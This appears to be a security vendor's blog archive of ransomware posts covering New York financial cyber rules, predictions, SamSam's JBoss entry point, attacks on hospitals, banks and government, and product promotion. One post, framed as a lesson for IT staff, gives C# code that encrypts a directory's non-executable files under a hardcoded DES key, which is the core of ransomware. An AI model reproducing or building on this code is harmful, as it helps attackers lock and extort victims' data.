Tag Archives: ransomware

Update: New York State Finalizes Cyber Rules for Financial Sector

Update: New York State Finalizes Cyber Rules for Financial Sector

When last we left New York State’s innovative cybercrime regulations, they were in a 45-day public commenting period. Let’s get caught up. The comments are now in. The rules were tweaked based on stakeholders’ feedback, and the regulations will begin a grace period starting March 1, 2017.

To save you the time, I did the heavy lifting and looked into the changes made by the regulators at the New York State Department of Financial Services (NYSDFS).

There are a few interesting ones to talk about. But before we get into them, let’s consider how important New York State — really New York City — is as a financial center.

Made in New York: Money!

To get a sense of what’s encompassed in the NYDFS’s portfolio, I took a quick dip into their annual report.

For the insurance sector, they supervise almost 900 insurers with assets of $1.4 trillion and receive premiums of $361 billion. Under wholesale domestic and foreign banks — remember New York has a global reach — they monitor 144 institutions with assets of $2.2 trillion. And I won’t even get into community and regional banks, mortgage brokers, and pension funds.

In a way, the NYSDFS has the regulatory power usually associated with a small country’s government. And therefore the rules that New York makes regarding data security has an outsized influence.

One Rule Remains the Same

Back to the rules. First, let’s look at one key part that was not changed.

NYSDFS received objections from the commenters on their definition of cyber events. This is at the center of the New York law—detecting, responding, and recovering from these events—so it’s important to take a closer look at its meaning.

Under the rules, a cybersecurity event is “any act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information …”

Some of the commenters didn’t like the inclusion of “attempt” and “unsuccessful”. But the New York regulators held firm and kept the definition as is.

Cybersecurity is a broader term than a data breach. For a data breach, there usually has to be data access and exposure or exfiltration. In New York State, though, access alone or an IT disruption, even when attempted (or executed but not successfully) is considered an event.

As we’ve pointed out in our ransomware and the law cheat sheet, very few states in the US would classify a ransomware attack as a breach under their breach laws.

But in New York State, if ransomware (or a remote access trojan or other malware) was loaded on the victim’s server and perhaps abandoned or stopped by IT in mid-hack, it would indeed be a cybersecurity event.

Notification Worthy

This leads naturally to another rule, notification of a cybersecurity event to the New York State regulators, where the language was tightened.

The 72-hour time frame for reporting remains, but the clock starts ticking after a determination by the financial company that an event has occurred.

The financial companies were also given more wiggle room in the types of events that require notification: essentially the malware would need to “have a reasonable likelihood of materially harming any material part of the normal operation…”

That’s a mouthful.

In short: financial companies will notify the regulators at NYSDFS when the malware could seriously affect an operation that’s important to the company.

For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.

The NYDFS’s updated notification rule language, by the way, puts it more in line with other data security laws, including the EU’s General Data Protection Regulation (GDPR).

So would you have to notify the New York State regulator when malware infects a server but hasn’t necessarily completed its evil mission?

Getting back to the language of “attempt” and “unsuccessful” found in the definition of cybersecurity events, it would appear that you would but only if the malware lands on a server that’s important to the company’s operations — either because of the data it contains or its function.

State of Grace

The original regulation also said you had to appoint a Chief Information Security Officer (CISO) who’d be responsible for seeing this cybersecurity regulation is carried out. Another important task of the CISO is to annually report to the board on the state of the company’s cybersecurity program.

With pushback from industry, this language was changed so that you can designate an existing employee as a CISO — likely a CIO or other C-level.

One final point to make is that the grace period for compliance has been changed. For most of the rules, it’s still 180 days.

But for certain requirements – multifactor authentication and penetration testing — the grace period has been extended to 12 months, and for a few others – audit trails, data retention, and the CISO report to the board — it’s been pushed out to 18 months.

For more details on the changes, check this legal note from our attorney friends at Hogan Lovells.

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions

Everyone makes predictions at this time of year, but who looks back to check on their accuracy? Let’s have a look at some of last year’s omens before directing our forecast lens to 2017.

Our first prediction for 2016: The U.S. Presidential campaign will be affected by a cyber attack.

We were on to something here, but we should have said numerous attacks. From Wikileaks exposing internal campaign emails to allegations that Russia attempted to affect the outcome, security became a front-and-center issue.

We also predicted: Ransomware damage will double.

We had the right direction but the problem actually became far worse than our modest foreboding (a real kick in the crystal ball). While 2015 saw about $325 million in ransom from CryptoLocker alone, 2016 will likely hit $1 billion in ransomware damages according to the FBI.

Amid the hacked ruins, compromised confidences and costly shakedowns of 2016 is the realization that privacy can never truly be assured for modern communications.

Let’s see what 2017 will bring.

1. Extortionware will be the new lucrative thing.

Ransomware’s more targeted, more difficult and more lucrative cousin, will emerge and cause major financial damages because of the sheer size of the payouts demanded when highly sensitive data is threatened with exposure. This will go largely unreported for reasons of discretion, making the prescience of this prediction conveniently unverifiable next year.

2. Ransomware will continue to be a major thing (and backups aren’t enough).

Ransomware will continue to grow in terms of the sheer number and frequency of attacks on organizations. IT best practices for defending against ransomware will expand from backup remediation to early detection and alerting as user behavior analytics become more intelligent and predictive. Stopping an attempted attack – before or right after it starts – is far more efficient and less painful than figuring out which files were affected and restoring them from backup.

3. Threats within will drive the need for smarter security analytics.

Adoption of security analytics will increase, as insider threats continue to get CXO and board-level attention. Insiders have legitimate access to systems and data, so preventing initial access is more than impractical. Detection is the next line of defense for employees or contractors who abuse their access, and to reveal insider credentials that are stolen.

4. Goodbye, ads. Hello, blockers.

The use of ad blockers will skyrocket after another major media site becomes a distributor of malware (as Forbes was in 2016) and users take more deliberate command of their own protection against growing malware threats.

5. Weaponizing IoT will become a regular occurrence.

IoT (Internet of Things) devices such as DVRs and security cameras will become more frequent targets for attackers. While the devices themselves may not all contain valuable data, they represent potential stepping stones on a hacker’s path to steal digital assets. The Mirai botnet, capable of some of the biggest attacks yet and able to reach high volumes with minimal ramp-up time, will threaten the adoption of IoT applications as device makers realize they must make security a design principle or lose their markets.

6. You’re hired, Ms. IT Security Candidate.

With $1 trillion predicted to be spent globally on cybersecurity between 2017 and 2021 and more than 200,000 security jobs currently unfilled in the U.S., computer security skills will continue to be the hottest kind in the IT job market in terms of the number of unfilled jobs and the compensation levels.

7. Organizations will need to save users from themselves.

User education on password hygiene and recognizing potential attacks will continue to increase but the reality will sink in that vigilance alone will not suffice, as phishing and malware become more and more difficult for even careful employees to detect. Organizational remedies will become more widespread to protect their employees, customers, partners, and themselves.

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. It the unfortunate victim wants to recover them he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by hacker to enable the malware to survive restarts and to disguise the software so it would be hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric algorithm is based on the idea of encrypting the files contents with a public key, but using a different private key that only that attacker has for decryption. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker encryption method, such as symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that does the symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathname, and then feeding the file contents to the encryption engine. Then of course the file has to be written back.

The list of the files to be encrypted is usually the ones companies are dependent on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to the size and the impact on the malwares performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available– and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

string key = "R?\n??i??";

Basically you can choose any key that you like, remember that we are going to choose symmetric algorithm so the key will be used for encrypting and decrypting as well.

Second snippet:   Encrypt an entire directory contents:

private static void EncryptDir(string d,int mili)
            DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
            FileInfo[] file;
            file = dirtoencrypt.GetFiles();
            foreach (FileInfo currentFile in file)
                if (currentFile.Extension.ToLower() != ".exe")
                    string key = "R?\n??i??";
                    EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);


Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

static void EncryptFile(string sInputFilename, \
static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
            FileStream fsInput = new FileStream(sInputFilename,

            FileStream fsEncrypted = new FileStream(sOutputFilename,
            DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
            DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
            DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
            ICryptoTransform desencrypt = DES.CreateEncryptor();
            CryptoStream cryptostream = new CryptoStream(fsEncrypted,

            byte[] bytearrayinput = new byte[fsInput.Length];
            fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);


That’s it!

A malicious tool with tons of damage potential in less than a 100 lines of code and under 10kb after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

New SamSam Ransomware Exploiting Old JBoss Vulnerability

New SamSam Ransomware Exploiting Old JBoss Vulnerability

One of the lessons learned from the uptick in ransomware attacks is that it pays to keep your security patches up to date. A few months ago the SamSam/Samas malware was (and is still) having great success primarily against healthcare companies and hospitals.

The attack vector, though, was not based on phishing or social engineering. SamSam instead exploits a very old (and surprising) vulnerability in JBoss, Red Hat’s Java-based web server environment.

No Phishing

JMX is the administrative console web app for JBOSS — yes, everything starts with a J. Unfortunately, by default, the JMX home page is available externally without any authentication checks.

Like any good admin took, JMX gives you access to some basic functions including running Java code.

Are you thinking what I’m thinking?

Hackers discovering this JBoss vulnerability quickly realized that if they could upload a simple shell they were on their way to controlling the server.

And that’s the way this exploit works. If you want to read the technical details and the coding involved, you can google on “jboss vulnerability”.

This is a very well-known security hole – the CVE dates back to 2010—and it has since been patched.

But it has come back into the limelight because the SamsSam ransomware has very successfully used it against healthcare orgs, which for whatever reasons are more likely to have JBoss installations.

Once the cyber thieves gain entry through JMX, they upload the ransomware. And start collecting the fees. No phishing required.

How bad is the problem?

According to Cisco security researchers, there could be as many as 3.2 million installations at risk.

Remote Access Trojan by Any other Name

Attackers can find sites that have JBoss by Google dorking, which allows you to search for part of the telltale URL – in this case “jmx-console”—that indicates a JBoss server on an exposed site.


It’s an admin console! It’s a remote access trojan! It’s both!

In looking at the JBoss attack techniques, I saw lots of code where the JMX interface acts as starting point to uploading and launching other software, say a reverse shell. So the vulnerability leaves open other attacks, not necessarily ransomware.

To put it bluntly, the JMX interface is an unintentional Remote Access Trojan or RAT, which we wrote about in our pen testing series.

Normally the attacker has to first install the RAT, but with these unpatched Red Hat installations it’s there — gasp!— waiting for them.

Maybe it’s a good time now to bring all your systems up to date with the latest security patches — I’m talking to you healthcare orgs!


One Take Away from Black Hat 2016: Designer Ransomware!

One Take Away from Black Hat 2016: Designer Ransomware!

We had an amazing week at Black Hat 2016.  One topic that was on attendees’ minds— besides hacking Jeeps and chip-and-pin technology — was ransomware. A security analysis firm now warns us that ransomware has become more clickable because the thieves are localizing the phish mail.

You should watch the video below for the full interview with an analyst from Sophos.

The key takeaway is that the ransomware designers have learned some marketing tricks from non-criminal enterprises.

These digital bandits know to focus their efforts on richer countries that can afford to pay the ransomware and then customize the email contents using very local companies and brands.

So you may receive a nicely crafted email with the name and logo of, say, a utility company or government agency. The hackers have gotten better at working out the location of the victims based on their IP addresses.

With the attackers improved powers of “market segmentation”, we’re a long way from one-size-fits-all Nigerian 419 schemes!

You and I could easily spot that the sender of the email containing the malware is phony – see our phish mail post — but the average employee might not.

Of course, your company should be boosting employee security budgets to make it less likely that workers will click on an UPS invoice.

More than that, though, companies should lower their overall risk exposure surface. It just makes sense, as Rob has just pointed out, to limit the files that the attacker can access in the first place.

We’ll be talking more about ransomware next week when we present the results of a custom survey that we’re finishing up.



Banks Secretly and Silently Struggling with Ransomware

Banks Secretly and Silently Struggling with Ransomware

“You’re almost certainly not going to hear about successful ransomware attacks on banks,” says Fraud Prevention Expert, Ross Hogan in an interview with Banking Exchange. “It is probably one of the most catastrophic events that a bank could suffer.”


If a financial institution made a public announcement that the firm was infected with ransomware, the brand damage would be irreparable.

Moreover, it could potentially create panic amongst customers, ensuing a bank run. Customers might decide to withdraw cash from a financial institution, destabilizing a bank to where it runs out of cash and unexpectedly face bankruptcy. The result of this scenario would be – from an economic standpoint – catastrophic.

And NO ONE wants this to happen.

But we know financial institutions are a target

How? Ransomware does not discriminate.

All it takes is one phishing click or a wrong installation and your computer or your entire network could take a hit. (Listen to our podcast: Journey of a Ransomware Attack)

“They’re not just trying to infect your workstation and lock your files on you workstation; they’re trying to go for any network drive they can find,” says Editor-in-Chief of Cyberheist Stu Sjouwerman. “That’s where the risk is. This is what happened at Presbyterian Hospital in Hollywood.”

Not only has ransomware infected hospitals, but schools, police departments, and city departments – all institutions that we rely on.

The financial industry took note. Last year, the Federal Financial Institutions Examination Council issued a ransomware warning about the frequency and severity of the threat.

What banks can do

Be proactive and learn how you can protect your organization from the inside out:

How Varonis helps financial services stop and prevent ransomware

We’ve been working with organizations from all verticals to prevent ransomware. And here are a few quotes from a few financial institutions that describe their experience with how Varonis helps them stop and prevent ransomware:

  • “Even though we have a state of the art firewall and new antivirus software, neither was able to detect or stop Crypto. Varonis DatAlert not only sent us email alerts when a user got hit by Crypto, but also logged that user out before the virus could do any damage to network shares. That alone justified its cost.” – Southern California Wealth Management Firm
  • “Our endpoint protection had detected the virus on a computer and had appropriately removed the code, but not before it had kicked off the encryption process. The point to note here is that although the endpoint had isolated the problem it wasn’t able to kill the process. Varonis was able to identify the process and then remediate the issue and we can prevent it from happening again.” – A Northwestern Bank
  • “ Of all the expensive security products we’ve purchased, DatAlert is the only solution that has done, and is doing, all of the alerting and notification of anomalous behavior, especially ransomware. ” – A Major Bank in Western Canada



How to Identify Ransomware: Use Our New Identification Tool

How to Identify Ransomware: Use Our New Identification Tool

Sadly, ransomware infections are routine enough that IT departments have started to develop standardized procedures for rapidly quarantining infected machines, determining the extent of damage and then attempting recovery operations..

For help with locking off computers performing suspicious actions (like modifying thousands of files in a minute), our DatAlert customers are using custom rules and scripts tied to behaviors. They’re running reports in DatAdvantage to rapidly find exactly which files were touched on which servers. However, until recently Varonis has been unable to help with recovery efforts.

While restoring files from backup is the best recovery option, often you’re still left with files which were created since the last backup was taken or in cases where the infection wasn’t promptly caught: where the files encrypted by the ransomware themselves were backed up.

If you’re in this situation, you need to:

    1. Identify the strain of ransomware you’ve been hit with.
    2. Locate an unlocking application (if any) for that strain.

To help with both of these recovery tasks, we’ve created a Ransomware Identifier. Enter either the file extension of the ransomware encrypted files, or the name of the ransom note file into the Ransomware Identifier search engine and rapidly get your answers.

Try the Ransomware Identifier Now

Next-Gen Ransomware (Ransomworm!) Gets Deadlier

Next-Gen Ransomware (Ransomworm!) Gets Deadlier

Ransomware developers have been busy adding more deadly functions to their evil creations. First we heard about DDOS capabilities appearing in modified versions of Cerber.  Now Microsoft reports that a new ransomware variant has the power to spread like a worm.

Known as ZCryptor, it infects other users by dropping an autorun.inf file into removable files – at a practical level, thumb drives that are attached to laptops, as well as network drives.

In other words, employees who are copying files onto USBs will be unwittingly spreading ZCryptor throughout the office.

Wormy Ransomware

Some are calling this new variant ransomworm. Surprisingly, this is not a new idea in malware history.

The first-ever virus, known as Brain, was essentially DOS-based ransomware that propagated through floppy disks. An infected diskette was made unreadable, and the victims had to call a phone number (in Pakistan) to get “inoculated”.

All the standard prevention and mitigation techniques apply to ZCryptor. Train your staff about identifying phish mails, keep up to date backups, review access rights of folders, and of course monitor with user behavior analytics software to detect unusual file access.

Varonis UBA vs. ZCryptor

User Behavior Analytics or UBA is a new technology that’s up to the challenge of preventing your files from being taken away from you and ransomed.

Without any configuration, our Varonis UBA threat models spot the signs of ransomware activity — when files are being encrypted — and therefore can stop these attacks without having to rely on a static list of signatures as is the case with conventional virus scanners.

Once detected, a series of automated steps can be triggered to prevent ransomware infections like ZCryptor from spreading.

Worried about ransomware? Learn how Varonis User Behavior Analytics can save you some bitcoins!

3 Malware Stats That Will Annoy You

3 Malware Stats That Will Annoy You

Earlier this week, it was reported that the Russian police arrested 50 suspected hackers for malware bank attacks. One of the largest arrests of hackers in Russian history, these alleged cybercriminals took over $45 million from banks. This arrest also prevented another potential bank heist that would have netted the cyber thieves $35 million.

While this arrest was a big win, malware like ransomware continues to make headline news with no signs of slowing down.

Here are three malware stats that will make your head spin.

1. First Ransomware to Add DDoS Capabilities to Pester You And Others

Security researchers found a modified version of the Cerber ransomware, which blocks user access and encrypts the data. Afterwards, a second malware binary called 3311.tmp rubs salt into your wounds by launching a DDoS attack and starts sending large amounts of network traffic out of the infected computer. Ouch!

They also found that even after victims pay the ransom, if they don’t clean up their systems, there’s a good chance the DDoS bot will remain on the infected computer.

Expect this new feature to show up more in the upcoming months.

2. Ransomware Campaign Managers Can Potentially Make $90,000/year

While the average American household brings in a little over $50,0001 a year, ransomware campaign managers can potentially make $90,0002 a year. Responsibilities of a ransomware campaign manager include recruiting distributors and malware development.

After a distributor is located and signed up with a campaign manager, the distributor is on their own to find victims and gets paid on commission. Typically, a campaign manager will have 10-15 distributors.

On the malware development front, if their code skills are sharp enough, it only requires a commitment of just a few hours a week.

Ransomware criminals can just sit back and watch the money flow in. For now, cybercrime pays well.

3. 93% of All Phishing Emails Are Now Ransomware

Since ransomware is easy to send and also offers a quick ROI, according to a new report, the free market has responded: 93% of all phishing emails now contain ransomware.

Should an employee accidently fall for a phish email, how can you prepare?

A recent Varonis poll of IT professionals found that those infected by ransomware reported that the biggest change to their existing plans after the attack was to increase security education for employees.






1 https://en.wikipedia.org/wiki/Household_income_in_the_United_States

2 http://www.csoonline.com/article/3078063/security/top-ransomware-campaign-managers-stand-to-make-90k-annually.html

Hospital Paid Ransom, Didn’t Get All Files Back

Hospital Paid Ransom, Didn’t Get All Files Back

Last week, a hospital based in Wichita, Kansas was hit with ransomware.

Yes, the hospital paid the ransom in hopes of getting back to business as soon as possible, but the payment only partially decrypted their files. Instead, the cybercriminals demanded more money to decrypt the rest.

The hospital refused to pay a second ransom because it was no longer “a wise maneuver or strategy.”

President Greg Duick, MD declined to say how much money the Kansas hospital paid, only that it was “a small amount.”

This Kansas hospital is not alone in their struggle. According to Healthcare IT News, more than half of hospitals in their poll were hit with ransomware in the last 12 months.

The Wichita hospital had a plan for this type of attack, but it couldn’t stop ransomware from happening. Brendan FitzGerald, HIMSS Analytics Research Director for Advisory Solutions, said that 73% of the health systems they surveyed also have a business continuity plan in place. Unfortunately, if ransomware hits, the plans might not be enough.

If the best laid plans aren’t sufficient, what do hospitals need to do the most? A recent Varonis poll of healthcare IT professionals provides an answer: those infected by ransomware reported that the biggest change to their existing plans after the attack was to increase security education for employees.

You’re in luck!

We are delighted to offer this free video training course with noted security researcher Troy Hunt, who covers everything you need to know about ransomware.

Also, our ransomware guide for hospitals is worth your while.

How has Ransomware Impacted the US Government?

How has Ransomware Impacted the US Government?

Ransomware crimes have been soaring this year. It has stalled the operations of not only hospitals and businesses, but also the US government – federal, state and local governments, law enforcement agencies and even schools.

How has the government reacted to this rising threat?

It’s been a challenge. Protecting a government’s digital assets has been time-consuming as threats constantly evolve and become even more sophisticated.

CIO Rami Zakaria of California’s Sacramento County said that he has four people who dedicate much of their time responding to potential threats and breaches.

He advised, “This is the new reality. You have to invest in information security.”

Part of that investment means backing up your data. While some IT professionals have said that they have a backup and they won’t have to pay the ransom. Once you add time, effort, upgrades, restoration, cleanup, etc it’s a type of payment that has impacted government operations.

How are the different branches of government paying? We broke it down, starting with the state, local and education agencies.

Ransomware twice as likely to hit State, Local and Education (SLED)

In 2014, thirty-five state and local governments reported problems with ransomware.1 So while this number isn’t huge, it’s also not insignificant. Because that same year, an attacker demanded $800,000 from the city of Detroit after infecting some of its computer files. However, the city didn’t pay because the encrypted data was stale.

And by 2015, according to a new report, the State and Local Government and Education (SLED) — 67% of government networks and 72% of education networks triggered critical malware or ransomware alerts, compared to just 39% of non-SLED networks triggering similar alerts.

The same report also said that SLED are nearly twice as likely to be infected with malware or ransomware and four times more likely to be infected with Cryptowall.

Earlier this year, ransomware infected a New Jersey school district’s “entire operations from internal and external communications to its point-of-sale for school lunches. It also prevented any students from taking the scheduled exams, which are entirely computerized.”

The school district didn’t pay the ransom and announced, “Encrypted files were restored from backup to their original state. Servers were restored to remove any trace of the malware. Email and other systems are being restored as quickly as possible.”

However, another district paid the $8,500 ransom because more than 40,000 teachers and students relied on the servers and thought that the amount wasn’t a lot for what the data is worth. They did say that paying more might not be an option.

The Federal Government’s Battle with Ransomware

While SLED has been struggling with ransomware, it appears that the federal government has been as well.

The Department of Homeland Security stated, in 2015, over 300 ransomware-related incidents affected 29 different federal networks. However, the Department is not aware of any instances in which federal agencies paid the ransom. Where government systems were confirmed to be infected with ransomware, the majority of infections affected end-user workstations. In all cases, the system was removed from the network and replaced with a clean system.

Despite efforts to thwart ransomware from the federal government, the fight continues.

Earlier this month, it appears that the House of Representatives technology service desk warned representatives of increased ransomware attacks on the House network. A spokesperson for the House Chief Administrative Officer declined to confirm whether or not the ransomware attacks were successful and it’s not clear whether the ransom was paid.

What they did confirm was that the ransomware attacks on the House would have a similar impact to any other large organization and would disrupt government operations. A ransomware attack could lock down draft bills, memos, emails and sensitive information.

Technologies that Stop Ransomware

To protect federal agencies against ransomware, the National Cybersecurity and Communications Integration Center has been using the EINSTEIN 3 Accelerated (E3A) system, which is designed to detect and block cyberattacks from compromising federal agencies.

However, according to a Government Accountability Officer(GAO) report, EINSTEIN has limits. Einstein comes up short because it relies on known signatures, which makes it vulnerable to new strains of ransomware.

“It doesn’t do a very good job in identifying deviations from normal network traffic,” said Gregory Wilshusen, the GAO director of information security issues who co-authored the audit of the Department of Homeland Security’s National Computer Protection System, which includes Einstein.

CIO magazine also warned, “… while a signature-based approach reduces the performance hit to the systems on which it runs, it also means somebody has to be the sacrificial sheep. Somebody has to get infected by a piece of malware so that it can be identified, analyzed and other folks protected against it. And in the meantime the malefactors can create new malware that signature-based defenses can’t defend against.”

If signature-based approach isn’t working, what technologies are being implemented to stop ransomware?

Security expert and founder of Bleeping Computer Lawrence Abrams recently wrote that “behavior detection is becoming the best way to detect and stop ransomware as signature detections have become easily bypassed.”

Behavior detection technology is also known as User Behavior Analytics (UBA) and it’s quickly becoming the best ransomware prevention measure.

UBA compares what users on a system are normally doing — their activities and file access patterns – against the non-normal activities of an attacker who’s stolen internal credentials.

First, the UBA engine monitors normal user behavior, by logging each individual user’s actions – file access, logins, and network activities. And then over time, UBA derives a profile that describes what it means to be that user.

So when a thousand “file modify” action happens in a short period of time, your IT admin will be notified.

Try UBA, it halts ransomware and prevents any further disruptions in government operations.


Further reading:


1 http://www.govtech.com/security/Ransomware-Poses-Tremendous-Threat-to-Police-Departments.html